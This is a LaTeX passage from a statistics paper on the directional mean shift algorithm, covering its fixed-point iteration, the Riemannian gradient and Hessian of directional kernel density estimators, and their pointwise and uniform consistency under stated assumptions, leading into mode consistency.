\item Directional data sample $\bm{X}_1,...,\bm{X}_n \sim f(\bm{x})$ on $\Omega_q$.
\item The smoothing bandwidth $h$.
\item An initial point $\hat{\bm{y}}_0 \in \Omega_q$ and the precision threshold $\epsilon >0$.
\end{itemize}
\While {$1- \hat{\bm{y}}_{s+1}^T \hat{\bm{y}}_s > \epsilon$}
\State
\begin{equation}
\hat{\bm{y}}_{s+1} = -\frac{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right) }{\norm{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right)}_2}
\label{fix_point_eq}
\end{equation}
\EndWhile
\State \textbf{Output}: A candidate local mode of directional KDE, $\hat{\bm{y}}_s$.
\end{algorithmic}
\end{algorithm}
We can encapsulate the directional mean shift algorithm into a single fixed-point equation. Let $\left\{\hat{\bm{y}}_s\right\}_{s=0}^{\infty} \subset \Omega_q$ denote the path of successive points defined by the directional mean shift algorithm, where $\hat{\bm{y}}_0$ is the initial point of the iteration. Translating the query point $\hat{\bm{y}}_s$ by the directional mean shift vector \eqref{mean_shift} at step $s$ leads to
$$\Xi_h\left(\hat{\bm{y}}_s \right) + \hat{\bm{y}}_s = \frac{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right)}{\sum_{i=1}^n L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right)}.$$
When $L(r)$ is decreasing, $L'(r)$ is non-positive on $[0,\infty)$ and
$$\norm{\Xi_h\left(\hat{\bm{y}}_s \right) + \hat{\bm{y}}_s}_2 = \frac{\norm{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right) }_2}{\left|\sum_{i=1}^n L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right) \right|} = -\frac{\norm{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right) }_2}{\sum_{i=1}^n L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right)}$$
given that $\sum\limits_{i=1}^n L'\left(\frac{1-\bm{y}_s^T\bm{X}_i}{h^2} \right) \neq 0$. (Here $L'(r)$ can be replaced by subgradients at non-differentiable points of $L$. See also Remark~\ref{Diff_Relax}.) Again, many commonly used kernel functions, such as the von-Mises kernel $L(r)=e^{-r}$, have nonzero derivatives on $[0,\infty)$ and satisfy this mild condition. Therefore,
\begin{equation*}
\hat{\bm{y}}_{s+1} = \frac{\Xi_h\left(\hat{\bm{y}}_s \right) + \hat{\bm{y}}_s}{\norm{\Xi_h\left(\hat{\bm{y}}_s \right) + \hat{\bm{y}}_s}_2} = -\frac{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right) }{\norm{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right)}_2}
\end{equation*}
is the resulting fixed-point equation for $s=0,1,...$, whose right-hand side is a standardized weighted sample mean at $\hat{\bm{y}}_s$ computed with ``kernel'' $G(r)=-L'(r)$. The entire mean shift algorithm with directional data is summarized in Algorithm \ref{Algo:MS} (see also Figure~\ref{fig:MS_One_Step} for a graphical illustration).
\begin{figure}
\centering
\includegraphics[width=0.7\linewidth]{Figures/MS_One_Step_1.pdf}
\caption{Illustration of one-step iteration of Algorithm \ref{Algo:MS}}
\label{fig:MS_One_Step}
\end{figure}
Analogous to the mean shift algorithm with Euclidean data, Algorithm \ref{Algo:MS} can be leveraged for mode seeking and clustering with directional data.
We derive statistical and computational learning theory for mode seeking in Sections \ref{Sec:grad_Hess_consist} and \ref{Sec:Algo_conv}.
For clustering, we demonstrate with both simulated and real-world data sets that the algorithm can be used to cluster directional data in Section~\ref{Sec:Experiments}.
It should also be noted that the directional mean shift algorithm can be viewed as a gradient ascent method on $\Omega_q$ with an adaptive step size; see Section~\ref{sec:linear} for details.
More importantly, similar to the standard mean shift algorithm with Euclidean data, the directional mean shift algorithm has several advantages over a regular gradient ascent method.
First, the directional mean shift algorithm requires no tuning of the step size parameter, yet exhibits mathematical simplicity when it is written as the fixed-point iteration \eqref{fix_point_eq}. Second, the algorithm does not need to estimate the normalizing constant $c_{h,q}(L)$ of the directional KDE in its application. Specifically, in order to identify local modes of the directional KDE using our algorithm, it is only necessary to specify the directional kernel $L$ up to a constant. This avoids additional computational cost in estimating the normalizing constant $c_{h,q}(L)$ for the kernel, because the constant $c_{h,q}(L)$ often involves complicated functions for high dimensional directional data. For instance, estimating the normalizing constant of the von Mises kernel involves an approximation of a modified Bessel function of the first kind, though several efficient algorithms have been developed; see, for instance, \cite{Sra2011}.
\section{Statistical Learning Theory of Directional KDE and its Derivatives}
\label{Sec:grad_Hess_consist}
Because the (directional) mean shift algorithm is inspired by a gradient ascent method, we study the gradient and Hessian systems of the two estimators $\hat f_h$ and $\tilde f_h$.
\subsection{Gradient and Hessian of Directional KDEs}
\label{Sec:grad_Hess_Dir}
We have demonstrated that it is valid to deduce two mathematically equivalent directional KDEs (\ref{Dir_KDE}) and (\ref{Dir_KDE2}) for estimating the true directional density $f$.
Somewhat surprisingly, the corresponding total gradients are different in general. The total gradient of $\tilde f_h$ is
\begin{equation}
\label{Dir_KDE_grad1}
\nabla \tilde{f}_h(\bm{x}) = \frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n (\bm{x} -\bm{X}_i) \cdot L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right),
\end{equation}
while the total gradient of $\hat{f}_h$ is
\begin{equation}
\label{Dir_KDE_grad2}
\nabla \hat{f}_h(\bm{x}) = -\frac{c_{h,q}(L)}{nh^2} \sum\limits_{i=1}^n \bm{X}_i L'\left(\frac{1-\bm{x}^T\bm{X}_i}{h^2} \right).
\end{equation}
Although the total gradients $\nabla \tilde{f}_h$ and $\nabla \hat{f}_h$ have different values even on $\Omega_q$, they both play a vital role in the directional mean shift algorithm (Algorithm~\ref{Algo:MS}). On the one hand, we have argued in Section \ref{Sec:MS_Dir} that $\nabla \tilde{f}_h(\bm{x})$ has a similar decomposition as the total gradient of the Euclidean KDE, and derived Algorithm~\ref{Algo:MS} based on $\nabla \tilde{f}_h(\bm{x})$. On the other hand, given the form of $\nabla \hat{f}_h(\bm{x})$ in \eqref{Dir_KDE_grad2}, the fixed-point equation \eqref{fix_point_eq} in Algorithm~\ref{Algo:MS} can be written as
\begin{equation}
\label{fix_point_grad}
\hat{\bm{y}}_{s+1} = \frac{\nabla \hat{f}_h(\hat{\bm{y}}_s)}{\norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2}.
\end{equation}
As argued in Section \ref{Diff_Geo_Review} and \eqref{radial}, any total gradient at $\bm{x} \in \Omega_q$ can be decomposed into radial and tangent components. Therefore, the total gradient $\nabla \tilde{f}_h(\bm{x})$ is decomposed as
\begin{align*}
\nabla \tilde{f}_h(\bm{x}) &= \bm{x}\bm{x}^T \nabla \tilde{f}_h(\bm{x}) + \left(I_{q+1} - \bm{x}\bm{x}^T \right)\nabla \tilde{f}_h(\bm{x})\\
&= \frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n \bm{x} \left(1 -\bm{x}^T\bm{X}_i \right) L'\left(\frac{1 -\bm{x}^T \bm{X}_i}{h^2} \right)\\
&\quad + \frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n \left(\bm{x} \cdot \bm{x}^T \bm{X}_i - \bm{X}_i \right) L'\left(\frac{1-\bm{x}^T\bm{X}_i}{h^2} \right)\\
&\equiv \mathtt{Rad}\left(\nabla \tilde{f}_h(\bm{x}) \right) + \mathtt{Tang}\left(\nabla \tilde{f}_h(\bm{x}) \right),
\end{align*}
where $\mathtt{Rad}$ and $\mathtt{Tang}$ are the radial and tangent components of the total gradient, as in \eqref{radial} and \eqref{tangent}. Similarly, we decompose $\nabla \hat{f}_h(\bm{x})$ as
\begin{align*}
\nabla \hat{f}_h(\bm{x}) &= \bm{x}\bm{x}^T \nabla \hat{f}_h(\bm{x}) + \left(I_{q+1} -\bm{x}\bm{x}^T \right) \nabla \hat{f}_h(\bm{x})\\
&= -\frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n \bm{x}\bm{x}^T\bm{X}_i \cdot L'\left(\frac{1 -\bm{x}^T \bm{X}_i}{h^2} \right) \\
&\quad + \frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n \left(\bm{x} \cdot \bm{x}^T \bm{X}_i - \bm{X}_i \right) \cdot L'\left(\frac{1-\bm{x}^T\bm{X}_i}{h^2} \right)\\
&\equiv \mathtt{Rad}\left(\nabla \hat{f}_h(\bm{x}) \right) + \mathtt{Tang}\left(\nabla \hat{f}_h(\bm{x}) \right).
\end{align*}
Therefore, the difference between the two total gradients $\nabla \tilde{f}_h(\bm{x})$ and $\nabla \hat{f}_h(\bm{x})$ is
\begin{equation}
\label{tot_grad_diff}
\nabla \tilde{f}_h(\bm{x}) - \nabla \hat{f}_h(\bm{x}) = \frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n L'\left(\frac{1 -\bm{x}^T \bm{X}_i}{h^2} \right) \cdot \bm{x},
\end{equation}
which is parallel to the radial direction $\bm{x}$. This implies that given kernel $L$, the Riemannian gradients of the two estimators are the same, that is,
\begin{align}
\label{tang_grad}
\begin{split}
\mathtt{grad}\, \hat{f}_h(\bm{x}) \equiv \mathtt{Tang}\left(\nabla \hat{f}_h(\bm{x}) \right) &= \nabla \hat{f}_h(\bm{x}) - \left[\bm{x}^T \nabla \hat{f}_h(\bm{x}) \right]\cdot \bm{x}\\
&= \frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n \left(\bm{x}^T \bm{X}_i \cdot \bm{x} - \bm{X}_i \right) \cdot L'\left(\frac{1-\bm{x}^T\bm{X}_i}{h^2} \right)\\
&=\mathtt{grad}\, \tilde{f}_h(\bm{x}) \equiv \mathtt{Tang}\left(\nabla \tilde{f}_h(\bm{x}) \right).
\end{split}
\end{align}
Later, we demonstrate in Theorems \ref{pw_conv_tang} and \ref{unif_conv_tang} that the Riemannian gradients of $\hat f_h$ and $\tilde f_h$ are consistent estimators of the Riemannian gradient of the underlying density $f$ that generates directional data. One can also deduce the same fixed-point equation \eqref{fix_point_eq} (or equivalently \eqref{fix_point_grad}) from the Riemannian/tangent gradient estimator $\mathtt{grad}\, \hat{f}_h(\bm{x})\equiv \mathtt{Tang}\left(\nabla \hat{f}_h(\bm{x}) \right)$, although the assumption on the directional estimated density $\hat{f}_h$ is stricter. See Appendix~\ref{Appendix:Tang_MS_DR} for detailed derivations.
Having demonstrated that the Riemannian gradients of $\tilde f_h$ and $\hat f_h$ are identical, we now study the Riemannian Hessians of $\tilde f_h$ and $\hat f_h$.
By \eqref{Hess_Dir}, the Riemannian Hessian of $\hat f_h$ is associated with the total gradient operator $\nabla$ via
\begin{equation}
\label{Hess_est}
\mathcal{H} \hat f_h(\bm x) = (I_{q+1} - \bm{x}\bm{x}^T) \left[\nabla\nabla \hat f_h(\bm{x}) - \nabla \hat f_h(\bm{x})^T \bm{x} I_{q+1} \right](I_{q+1} - \bm{x}\bm{x}^T)
\end{equation}
and similarly for $\mathcal{H} \tilde f_h(\bm x)$. The following lemma shows that when a directional kernel $L$ is smooth, the two Riemannian Hessians are identical.
\begin{lemma}
\label{lem:Hessian}
Assume that kernel $L$ is twice continuously differentiable.
Then,
$$\mathcal{H}\tilde f_h(\bm x)=\mathcal{H}\hat f_h(\bm x)$$
for any point $\bm{x}\in\Omega_q$.
\end{lemma}
The proof of Lemma~\ref{lem:Hessian} can be found in Appendix~\ref{Appendix:lem1_pf}. As a result, we can compute the Riemannian Hessian estimator at point $\bm{x}\in \Omega_q$
based on either $ \tilde{f}_h(\bm{x})$ or $ \hat{f}_h(\bm{x})$, which will produce the same expression.
Later, in Theorems \ref{pw_conv_tang} and \ref{unif_conv_tang}, we demonstrate that $\mathcal{H} \hat{f}_h(\bm x)$ is a (uniformly) consistent estimator of $\mathcal{H} f(\bm x)$ defined in (\ref{Hess_Dir}).
\subsection{Assumptions}
\label{Sec:Consist_Assump}
To apply the total gradient operator $\nabla$ to a directional density $f$ that generates data, we extend it from $\Omega_q$ to $\mathbb{R}^{q+1} \setminus\{\bm{0}\}$ by defining $f(\bm{x}) \equiv f\left(\frac{\bm{x}}{||\bm{x}||_2} \right)$ for all $\bm{x}\in \mathbb{R}^{q+1} \setminus \{\bm{0} \}$. In this extension, we assume that the total gradient $\nabla f(\bm{x}) = \left(\frac{\partial f(\bm{x})}{\partial x_1},..., \frac{\partial f(\bm{x})}{\partial x_{q+1}} \right)^T$ and total Hessian matrix $\nabla\nabla f(\bm{x}) = \left(\frac{\partial^2 f(\bm{x})}{\partial x_i \partial x_j} \right)_{1\leq i,j \leq q+1}$ in $\mathbb{R}^{q+1}$ exist, and are continuous on $\mathbb{R}^{q+1} \setminus \{\bm{0} \}$ and square integrable on $\Omega_q$.
This extension has also been used by \cite{Zhao2001,Dir_Linear2013,Exact_Risk_bw2013}.
Note that the Riemannian gradient and Hessian are invariant under this extension.
To establish the consistency results of gradient and Hessian estimators (cf. \eqref{tang_grad} and \eqref{Hess_est} or \eqref{Hess_KDE} in its explicit form), we consider the following assumptions.
\begin{itemize}
\item {\bf (D1)} Assume that the extended density function $f$ is at least three times continuously differentiable on $\mathbb{R}^{q+1}\setminus \left\{\bm{0}\right\}$ and that its derivatives are square integrable on $\Omega_q$.
\item {\bf (D2)} Assume that $L: [0,\infty) \to [0,\infty)$ is a bounded and Riemann integrable function such that
$$0< \int_0^{\infty} L^k(r) r^{\frac{q}{2}-1} dr < \infty$$
for all $q\geq 1$ and $k=1,2$.
\item {\bf (D2')} Under (D2), we further assume that $L$ is a twice continuously differentiable function on $(-\delta_L,\infty) \subset \mathbb{R}$ for some constant $\delta_L>0$ such that
$$0< \int_0^{\infty} L'(r)^k r^{\frac{q}{2}-1} dr < \infty, \quad 0< \int_0^{\infty} L''(r)^k r^{\frac{q}{2}-1} dr < \infty$$
for all $q\geq 1$ and $k=1,2$.
\end{itemize}
Here, conditions (D1) and (D2) are required for the consistency of the directional KDE \citep{KDE_Sphe1987,KLEMELA2000,Zhao2001,Dir_Linear2013,Exact_Risk_bw2013}. The stronger condition (D2') is imposed for the consistency of Riemannian gradient estimator $\mathtt{grad}\, \hat{f}_h(\bm{x}) \equiv \mathtt{Tang}\left(\nabla \hat{f}_h(\bm{x}) \right)$ and Hessian estimator $\mathcal{H} \hat{f}_h(\bm x)$.
The differentiability condition in (D2') can be relaxed so that $L$, after being smoothly extrapolated from $[0,\infty)$ to $(-\delta_L,\infty)$ for some constant $\delta_L >0$, is (twice) continuously differentiable except for a set of points with Lebesgue measure $0$ on $(-\delta_L,\infty)$.
One can justify via integration by parts that many commonly used kernels, such as the von-Mises kernel $L(r)=e^{-r}$ or compactly supported kernels, satisfy condition (D2').
Under conditions (D1) and (D2), the pointwise convergence rate of $\hat f_h$ is
$$\hat{f}_h(\bm{x}) - f(\bm{x}) = O(h^2) + O_P\left(\sqrt{\frac{1}{nh^q}} \right);$$
see, for instance, \cite{KDE_Sphe1987, Zhao2001,Exact_Risk_bw2013, Dir_Linear2013}.
Moreover, \cite{KDE_direct1988} used a piecewise constant kernel function to approximate the given kernel $L$ and derived the uniform convergence rate as
\begin{equation}
\label{Dir_KDE_unif_conv}
\|\hat{f}_h- f\|_{\infty}= \sup_{\bm{x}\in \Omega_q} \left|\hat{f}_h(\bm{x}) -f(\bm{x}) \right| = O(h^2) + O_P\left(\sqrt{\frac{\log n}{nh^q}} \right).
\end{equation}
One can also prove the uniform consistency of the directional KDE by slightly modifying the technique in \cite{Gine2002} and \cite{Einmahl2005} for the consistency results of the usual Euclidean KDE.
We will leverage such technique in our proof for the uniform convergence rates of the Riemannian gradient and Hessian estimators.
\subsection{Pointwise Consistency}
Our derivations of the pointwise convergence rates of the (Riemannian) gradient and Hessian estimators of the directional KDE $\hat{f}_h$ are analogous to the arguments for the usual Euclidean KDE \citep{Silverman1986,Scott2015}, which rely on the Taylor's expansion. The difference in the directional KDE case is that the integrals are taken over the Lebesgue measure $\omega_q$ on $\Omega_q$ when we compute the expectations $\mathbb{E}\left[\mathtt{grad}\, \hat{f}_h(\bm{x}) \right]$ and $\mathbb{E}\left[\mathcal{H} \hat{f}_h(\bm x) \right]$. The key argument for evaluating directional integrals is the following change-of-variable formula
$$\omega_q(d\bm{x}) = (1-t^2)^{\frac{q}{2}-1} dt\, \omega_{q-1}(d\bm{\xi}),$$
where $t=\bm{x}^T\bm{y}$ for a fixed point $\bm{y}\in \Omega_q$ and $\bm{\xi} \in \Omega_q$ is a unit vector orthogonal to $\bm{y}$. The formula is proved in Lemma 2 of \cite{Dir_Linear2013} and on pages 91-93 in \cite{Sphe_Harm} in two different ways. The surface area of $\Omega_q$ in (\ref{surf_area}) easily follows from this formula.
With this formula, we have the following convergence results.
\begin{theorem}
\label{pw_conv_tang}
Assume conditions (D1) and (D2').
For any fixed $\bm{x}\in \Omega_q$, we have
$$\mathtt{grad}\, \hat{f}_h(\bm{x})- \mathtt{grad}\, f(\bm{x}) = O(h^2) + O_P\left(\sqrt{\frac{1}{nh^{q+2}}} \right)$$
as $h\to 0$ and $nh^{q+2} \to \infty$.\\
Under the same condition, for any fixed $\bm{x}\in \Omega_q$, we have
$$\mathcal{H} \hat{f}_h(\bm x) - \mathcal{H} f(\bm x) = O(h^2) + O_P\left(\sqrt{\frac{1}{nh^{q+4}}} \right)$$
as $h\to 0$ and $nh^{q+4} \to \infty$.
\end{theorem}
The proof of Theorem~\ref{pw_conv_tang} is lengthy and deferred to Appendix~\ref{Appendix:Thm2_pf}. Theorem~\ref{pw_conv_tang} demonstrates that the Riemannian gradient of a directional KDE is a consistent estimator of the Riemannian gradient of the directional density that generates data.
A similar result holds for the Riemannian Hessian.
It cannot be claimed that the total gradients $\nabla \hat f_h$ or $\nabla \tilde f_h$ converge to $\nabla f$ since the radial component of $f$ depends on how $f$ is extended to points outside $\Omega_q$. Lemma~\ref{Rad_grad} below and the proof of Theorem~\ref{pw_conv_tang} demonstrate that the limiting behaviors of $\mathtt{Rad}\left(\nabla \hat{f}_h(\bm{x}) \right)$ and $\mathtt{Rad}\left(\nabla \tilde{f}_h(\bm{x}) \right)$ are different; the former one is of the order $O\left(h^{-2} \right) + O_P\left(\sqrt{\frac{1}{nh^{q+4}}} \right)$ while the latter one is of the order $O(1) + O_P\left(\sqrt{\frac{1}{nh^{q+2}}} \right)$.
Note that
\cite{KLEMELA2000} also derived similar convergence rates of the derivatives of a directional KDE, while the definitions of directional KDE and its derivatives in \cite{KLEMELA2000} are different from ours and the results are more complex.
\begin{remark}
Under some smoothness conditions \citep{Asymp_deri_KDE2011}, the pointwise convergence rates of gradient and Hessian estimators defined by the usual Euclidean KDE are
$$O(h^2) + O_P\left(\frac{1}{nh^{d+2}} \right) \quad \text{ and } \quad O(h^2) + O_P\left(\frac{1}{nh^{d+4}} \right),$$
where $d$ represents the dimension of the Euclidean data. Therefore, our pointwise consistency results for the Riemannian gradient and Hessian of the directional KDE in Theorem~\ref{pw_conv_tang} align with the pointwise convergence rates of the usual Euclidean KDE, in the sense that the dimension $d$ is replaced by the (intrinsic) manifold dimension $q$ of directional data.
\end{remark}
\subsection{Uniform Consistency}
We now strengthen the convergence results in Theorem \ref{pw_conv_tang} to uniform convergence rates with the assumptions and techniques developed by \cite{Gine2002} and \cite{Einmahl2005}.
Let $[\tau]=(\tau_1,...,\tau_{q+1})$ be a multi-index (that is, $\tau_1,...,\tau_{q+1}$ are non-negative integers and $|[\tau]|=\sum\limits_{j=1}^{q+1} \tau_j$). Define $D^{[\tau]} = \frac{\partial^{\tau_1}}{\partial x_1^{\tau_1}} \cdots \frac{\partial^{\tau_{q+1}}}{\partial x_1^{\tau_{q+1}}}$ as the $|[\tau]|$-th order partial derivative operator.
Given the directional KDE in \eqref{Dir_KDE2}, we define the following function class of the kernel function $L$ and its partial derivatives as
$$\mathcal{K} = \left\{ \bm{u}\mapsto K\left(\frac{\bm{z}-\bm{u}}{h} \right): \bm{u}, \bm{z}\in \Omega_q, h>0, K(\bm{x}) = D^{[\tau]} L\left(\frac{1}{2}||\bm{x}||_2^2 \right), |[\tau]|=0,1,2 \right\}.$$
Under condition (D2'), $\mathcal{K}$ is a collection of bounded measurable functions on $\Omega_q$. To guarantee the uniform consistency of the directional KDE itself as well as its (Riemannian) gradient and Hessian, we assume the following:
\begin{itemize}
\item {\bf (K1)} $\mathcal{K}$ is a bounded VC (subgraph) class of measurable functions on $\Omega_q$, that is, there exist constants $A,\vartheta >0$ such that for any $0 < \epsilon <1$,
$$\sup_Q N\left(\mathcal{K}, L_2(Q), \epsilon ||F||_{L_2(Q)} \right) \leq \left(\frac{A}{\epsilon} \right)^{\vartheta},$$
where $N(T,d_T,\epsilon)$ is the $\epsilon$-covering number of the pseudometric space $(T,d_T)$, $Q$ is any probability measure on $\Omega_q$, and $F$ is an envelope function of $\mathcal{K}$. The constants $A$ and $\vartheta$ are usually called the VC (Vapnik-Chervonenkis) characteristics of $\mathcal{K}$ and the norm $||F||_{L_2(Q)}$ is defined as $\left[\int_{\Omega_q} |F(\bm{x})|^2 dQ(\bm{x}) \right]^{\frac{1}{2}}$.
\end{itemize}
Given the differentiability of kernel $L$ guaranteed by (D2'), we can take $F$ as a constant envelope function
$$C_{\mathcal{K}} = \sup_{\bm{x}\in \mathbb{R}^{q+1}, |[\tau]|=0,1,2} \left|D^{[\tau]} L\left(\frac{1}{2}||\bm{x}||_2^2 \right) \right|$$
when it is finite.
Condition (K1) is not stringent in practice and can be satisfied by many kernel functions, such as the von-Mises kernel $L(r)=e^{-r}$ and many compactly supported kernels on $[0,\infty)$. For these kernel options, the resulting function class $\mathcal{K}$ comprises only functions of the form $\bm{u} \mapsto \Phi\left(|\bm{A}\bm{u}+\bm{b}| \right)$, where $\Phi$ is a real-valued function of bounded variation on $[0,\infty)$, $\bm{A}$ ranges over matrices in $\mathbb{R}^{(q+1)\times (q+1)}$, and $\bm{b}$ ranges over $\mathbb{R}^{q+1}$. Thus, $\mathcal{K}$ is of VC (subgraph) class by Lemma 22 in \cite{Nolan1987}.
Under conditions (D1), (D2'), and (K1), the uniform consistency results of the directional KDE (restated) as well as its Riemannian gradient and Hessian estimators are summarized as the following theorem, whose proof can be founded in Appendix~\ref{Appendix:Thm4_pf}.
\begin{theorem}
\label{unif_conv_tang}
Assume (D1), (D2'), and (K1). The uniform convergence rate of $\hat{f}_h$ is given by
$$\sup_{\bm x \in\Omega_q}|\hat{f}_h(\bm x) -f(\bm x)| = O(h^2) + O_P\left(\sqrt{\frac{|\log h|}{nh^q}} \right)$$
as $h\to 0$ and $\frac{nh^q}{|\log h|} \to \infty$. \\
Furthermore, the uniform convergence rate of $\mathtt{grad}\, \hat{f}_h(\bm{x})$ on $\Omega_q$ is
$$\sup_{\bm x\in\Omega_q}\norm{\mathtt{grad}\, \hat{f}_h (\bm x)- \mathtt{grad}\, f(\bm x) }_{\max} = O(h^2) + O_P\left(\sqrt{\frac{|\log h|}{nh^{q+2}}} \right),
$$
as $h\to 0$ and $\frac{nh^{q+2}}{|\log h|} \to \infty$.
Finally, the uniform convergence rate of $\mathcal{H} \hat{f}_h(\bm x)$ on $\Omega_q$ is
$$
\sup_{\bm{x}\in \Omega_q}\norm{\mathcal{H} \hat{f}_h(\bm x) - \mathcal{H} f(\bm x)}_{\max}
= O(h^2) + O_P\left(\sqrt{\frac{|\log h|}{nh^{q+4}}} \right),
$$
as $h\to 0$ and $\frac{nh^{q+4}}{|\log h|} \to \infty$, where $\norm{\cdot}_{\max} $ is the elementwise maximum norm for a vector in $\mathbb{R}^{q+1}$ or a matrix in $\mathbb{R}^{(q+1)\times (q+1)}$.
\end{theorem}
\begin{remark}
Theorem~\ref{unif_conv_tang} can also be generalized to higher-order derivatives.
All that is necessary is to modify the assumptions (D2') and (K1) to higher-order derivatives (projected on the tangent direction) as well as strengthen the differentiable assumptions on $f$ in (D1).
The elementwise maximum norm between the derivative estimator and the true quantity will embrace the rate
$$
O(h^2) + O_P\left(\sqrt{\frac{|\log h|}{nh^{q+2m}}}\right),
$$
where $m$ is the highest order of derivatives desired.
\end{remark}
\subsection{Mode Consistency}
\label{Sec:Mode_Const}
Consistency of estimating local modes has been established for the usual Euclidean KDE by \cite{Mode_clu2016}, where the authors demonstrated that with probability tending to 1, the number of estimated local modes is the same as the number of true local modes under appropriate assumptions. Moreover, the convergence rate of the Hausdorff distance (a common distance between two sets) between the collection of local modes and its estimator is elucidated. Here, we reproduce the consistency of estimating local modes of a directional density $f$ supported on $\Omega_q$ by the local modes of the directional KDE $\hat{f}_h$.
Given two sets $A,B \subset \Omega_q$, their Hausdorff distance is
\begin{equation}
\label{Haus_def}
\mathtt{Haus}(A,B) = \inf\left\{r>0: A\subset B \oplus r, B \subset A \oplus r \right\},
\end{equation}
where $A\oplus r =\left\{\bm{y}\in \Omega_q: \inf_{\bm{x}\in A} \norm{\bm{x}-\bm{y}}_2 \leq r \right\} = \left\{\bm{y}\in \Omega_q: \sup_{\bm{x}\in A} \bm{x}^T\bm{y} \geq 1-\frac{r^2}{2} \right\}$. The equality follows from the fact that $\norm{\bm{x}}_2^2=1$ for any $\bm{x}\in \Omega_q$.
Let $C_3$ be the upper bound for the partial derivatives of the directional density $f$ on the compact manifold $\Omega_q$ up to the third order.
Such constant exists under condition (D1).
Let $\hat{\mathcal{M}}_n = \left\{\hat{\bm{m}}_1,...,\hat{\bm{m}}_{\hat{K}_n} \right\}$ be the collection of local modes of $\hat{f}_h$ and $\mathcal{M}=\left\{\bm{m}_1,...,\bm{m}_K \right\}$ be the collection of local modes of $f$. Here, $\hat{K}_n$ is the number of estimated local modes and $K$ is the number of true local modes. We consider the following assumptions.
\begin{itemize}
\item {\bf (M1)} There exists $\lambda_* >0$ such that
$$0 < \lambda_* \leq |\lambda_1(\bm{m}_j)|, \quad \text{ for all } j=1,...,K,$$
where $0>\lambda_1(\bm{x}) \geq \cdots \geq \lambda_q(\bm{x})$ are the $q$ smallest (negatively-largest) eigenvalues of the Riemannian Hessian $\mathcal{H} f(\bm x)$.
\item {\bf (M2)} There exist $\Theta_1,\rho_* >0$ such that
$$\left\{\bm{x}\in \Omega_q: \norm{\mathtt{Tang}(\nabla f(\bm{x}))}_{\max} \leq \Theta_1, \lambda_1(\bm{x}) \leq -\frac{\lambda_*}{2} <0 \right\} \subset \mathcal{M} \oplus \rho_*,$$
where $\lambda_*$ is defined in (M1) and $0<\rho_* < \min\left\{\sqrt{2-2\cos\left(\frac{3\lambda_*}{2C_3}\right)}, 2\right\}$.
\end{itemize}
Condition (M1) is imposed so that every local mode of $f$ is isolated from other critical points; see Lemma 3.2 in \cite{Morse_Homology2004}. The condition also guarantees that the number of local modes of $f$ supported on the compact manifold $\Omega_q$ is finite. As noted by \cite{Mode_clu2016}, condition (M1) always holds when $f$ is a Morse function on $\Omega_q$. The second condition (M2) regularizes the behavior of $f$ so that points with near 0 (Riemannian) gradients and negative eigenvalues of $\mathcal{H} f(\bm x)$ within the tangent space $T_{\bm{x}}$ must be close to local modes. See the paper by \cite{Mode_clu2016} for detailed discussion. The constant $\sqrt{2-2\cos\left(\frac{3\lambda_*}{2C_3}\right)}$ is selected so that the great-circle distance from $\bm{m}_k$ to the boundary of $\bm{m}_k \oplus \rho_*$, that is, $\arccos(\bm{m}_k^T \bm{x})$ with $\bm{x}\in \partial S_k$, is less than $\frac{3\lambda_*}{2C_3}$ for any $\bm{m}_k \in \mathcal{M}$, where $S_k=\left\{\bm{x}\in \Omega_q: \norm{\bm{x}-\bm{m}_k}_2 \leq \rho_* \right\}$ and $\partial S_k = \{\bm{x}\in \Omega_q: \norm{\bm{x}-\bm{m}_k}_2 = \rho_* \}$.
It should be emphasized that condition (M1) is a weak condition that can be satisfied by the local modes of common directional densities. We take the von-Mises-Fisher density as an example. With the formula \eqref{vMF_density}, we naturally extend $f_{\text{vMF}}$ to $\mathbb{R}^{q+1}$ and deduce that
$$\nabla f_{\text{vMF}}(\bm{x}) = \nu \bm{\mu} C_q(\nu) \cdot \exp\left(\nu \bm{\mu}^T \bm{x} \right) \quad \text{ and } \quad \nabla\nabla f_{\text{vMF}}(\bm{x}) = \nu^2 \bm{\mu} \bm{\mu}^T C_q(\nu) \cdot \exp\left(\nu \bm{\mu}^T \bm{x} \right),$$
which in turn indicates that at the mode $\bm{\mu} \in \Omega_q$,
\begin{align*}
\mathcal{H} f_{\text{vMF}}(\bm{\mu}) &= \left(I_{q+1} -\bm{\mu} \bm{\mu}^T \right) \nabla\nabla f_{\text{vMF}}(\bm{\mu}) \left(I_{q+1} -\bm{\mu} \bm{\mu}^T \right) -\bm{\mu}^T \nabla f_{\text{vMF}}(\bm{\mu}) \left(I_{q+1} -\bm{\mu} \bm{\mu}^T \right)\\
&= -\nu C_q(\nu) \cdot e^{\nu} \left(I_{q+1} -\bm{\mu} \bm{\mu}^T \right).
\end{align*}
By Brauer's theorem (Example 1.2.8 in \citealt{HJ2012}), we conclude that the eigenvalues of $\mathcal{H} f_{\text{vMF}}(\bm{\mu})$ are 0 with (algebraic) multiplicity 1, which is associated with the eigenvector $\bm{\mu}$, and $-\nu C_q(\nu) \cdot e^{\nu}$ with multiplicity $q$, which are associated with the eigenvectors in $T_{\bm{\mu}}$.
Given these assumptions, the mode consistency of the directional KDE is as follows.
